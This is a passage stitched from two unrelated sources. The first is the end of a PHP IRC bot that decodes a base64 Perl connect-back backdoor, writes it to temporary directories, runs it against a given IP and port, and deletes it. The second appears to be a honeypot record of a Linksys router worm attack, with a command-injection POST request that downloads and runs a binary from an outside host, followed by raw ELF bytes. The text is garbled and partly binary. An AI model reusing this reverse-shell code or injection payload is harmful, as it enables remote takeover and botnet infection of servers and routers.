$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
Linksys "The Moon" Worm
[Attack info]
Attacker:
221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 192.168.0.14:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP
Resource ( 1 / 2 )
MD5: a3e8823f36ad8356086415bb766035cb
Type: application/x-executable
Size: 71996
URL: http://104.244.78.187/bins/wolf.mpsl
ELF `@ 4 4 (
@ @ � � E E � P
Q�td <��'!��' �� �� �� <葜'!� ��� �9' � �� <���'!���� ��9' � �� �� � �' <���'!���' �� �� �� ����� �"� @ ��� � Y� B$ � � � �� Y� �� B$Ȃ�� @ $���Ȃ�� � ��$ �� $�"� �� �� �� �( �' <Đ�'!��' �� ����������$ @��$ � �� ��������� @�$ �� �' �� � �'